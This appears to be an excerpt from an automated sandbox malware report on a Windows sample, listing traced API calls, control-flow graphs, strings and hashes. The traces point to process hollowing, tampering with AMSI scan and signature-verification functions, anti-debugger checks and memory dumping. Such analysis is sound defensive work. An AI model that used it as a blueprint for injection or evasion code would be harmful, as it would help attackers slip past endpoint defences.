                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000890,02B77424,ScanString,02B773A8,02B0A93C,UacInitialize,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,UacInitialize,02B773A8), ref: 02B09602
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3386062106-51457883
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7aa0e3d7700e78b4246833cadb8d54f06215e213c02f5e3e341db5c34170d18b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eba0b6cbf498972da7b569dd4c73c76364cf76361415733c496c360b619d6cfb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa0e3d7700e78b4246833cadb8d54f06215e213c02f5e3e341db5c34170d18b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E2EF35B806199BDB52FBA4D9C0BCFB7BAAF88300F1045E1B705AB254DE34AE458F51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 10945 2af5acc-2af5b0d GetModuleFileNameA RegOpenKeyExA 10946 2af5b4f-2af5b92 call 2af5908 RegQueryValueExA 10945->10946 10947 2af5b0f-2af5b2b RegOpenKeyExA 10945->10947 10952 2af5bb6-2af5bd0 RegCloseKey 10946->10952 10953 2af5b94-2af5bb0 RegQueryValueExA 10946->10953 10947->10946 10949 2af5b2d-2af5b49 RegOpenKeyExA 10947->10949 10949->10946 10950 2af5bd8-2af5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10949->10950 10954 2af5c0f-2af5c13 10950->10954 10955 2af5cf2-2af5cf9 10950->10955 10953->10952 10956 2af5bb2 10953->10956 10958 2af5c1f-2af5c35 lstrlenA 10954->10958 10959 2af5c15-2af5c19 10954->10959 10956->10952 10960 2af5c38-2af5c3b 10958->10960 10959->10955 10959->10958 10961 2af5c3d-2af5c45 10960->10961 10962 2af5c47-2af5c4f 10960->10962 10961->10962 10963 2af5c37 10961->10963 10962->10955 10964 2af5c55-2af5c5a 10962->10964 10963->10960 10965 2af5c5c-2af5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2af5c84-2af5c86 10964->10966 10965->10966 10966->10955 10967 2af5c88-2af5c8c 10966->10967 10967->10955 10968 2af5c8e-2af5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2af5cc0-2af5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5AE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B06
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B24
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02AF5B42
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02AF5B8B
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02AF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001), ref: 02AF5BA9
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02AF5BD8,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02AF5BCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02AF5BE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02AF5BF5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02AF5BFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02AF5C26
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5C6D
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5C7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5CA5
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5CB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02AF5CDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02AF5CEB
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f2e75bb43150ecfca3ba8e509bccf8f389df50e246a191d4706252537a36b77c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 136bea4545f287c1239ee5c6b73b77382a25e6fd98ca3810a6c75c9ae900abaf
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2e75bb43150ecfca3ba8e509bccf8f389df50e246a191d4706252537a36b77c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50519771E4025C7AFB61D7E48D86FEFB7AD9B04744F4001A1BB05E6181EF789A448FA0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13205 2b0894c-2b08971 LoadLibraryW 13206 2b08973-2b0898b GetProcAddress 13205->13206 13207 2b089bb-2b089c1 13205->13207 13208 2b089b0-2b089b6 FreeLibrary 13206->13208 13209 2b0898d-2b089ac call 2b07d78 13206->13209 13208->13207 13209->13208 13212 2b089ae 13209->13212 13212->13208
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8940693a5ed822a6a85aab8fbfe46e1954ae29780034a27a47fa883c9fb5d1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e29e2ed4e2301bb0ca1464c6e825a8f9ab924e6ae925f8360c0c0f0586e21a9e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8940693a5ed822a6a85aab8fbfe46e1954ae29780034a27a47fa883c9fb5d1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0A4B1EC03045EF350A668A989F57F79CD74079CF0289A9BA1887190CE74145AEF50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13222 2b0f744-2b0f75e GetModuleHandleW 13223 2b0f760-2b0f772 GetProcAddress 13222->13223 13224 2b0f78a-2b0f792 13222->13224 13223->13224 13225 2b0f774-2b0f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2b0f786 13225->13226 13226->13224
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B0F754
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B0F766
                                                                                                                                                                                                                                                                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B0F77D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3122f54641c1e3c1db1f8ac22c364bd546a5142463ae8d5b97c17bc675a641f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d2f1dce2d3b170a87af933cb1c8c98b17c7ada64ab46ea2a55fd1853f34c8a81
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3122f54641c1e3c1db1f8ac22c364bd546a5142463ae8d5b97c17bc675a641f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0AE70644248BAEB22A6F488C87ECFF799B05324F1443D1A435615D1EF791641C652
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDAB
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B0DDF0
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B0DE1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B0DE25
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4b0db1087507bbe0af473974f7ffb22c497665b0e6f88ab40c42411297ad1449
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 31a6cf4abfab9e84f4e18a1843f57b8102d72433aaedecf236dcacb4e8b25812
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b0db1087507bbe0af473974f7ffb22c497665b0e6f88ab40c42411297ad1449
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC21C071A80309BAEB51EAD4CD92FDF7BBDEB48700F510461B700F71C0DA74AA058B54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B0E5F6
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f42c65f6a757bc37d5c97e9d4880ec6c794719205b78c7b00ec481f39f71a68e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3944543b28595d67469c5195c1d17a324278adfb1352fef2104f650a0f1abcbd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f42c65f6a757bc37d5c97e9d4880ec6c794719205b78c7b00ec481f39f71a68e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99411035B402099BEB41EBE4D981ADFB7BAEF8C700F104865F641A7291DE78ED018F55
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3f95fb80d95b777c765213da74c823bbcf6ead233fb276460267406045f685b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4817392de58f396c0ebd0856d64edfd97443c07b0d25e479d56ebf7339cacb22
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f95fb80d95b777c765213da74c823bbcf6ead233fb276460267406045f685b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4521B171A80209BAEB51EAD4DD82FDE77BDEB08B00F5145A1B704F71D0DBB46B058B54
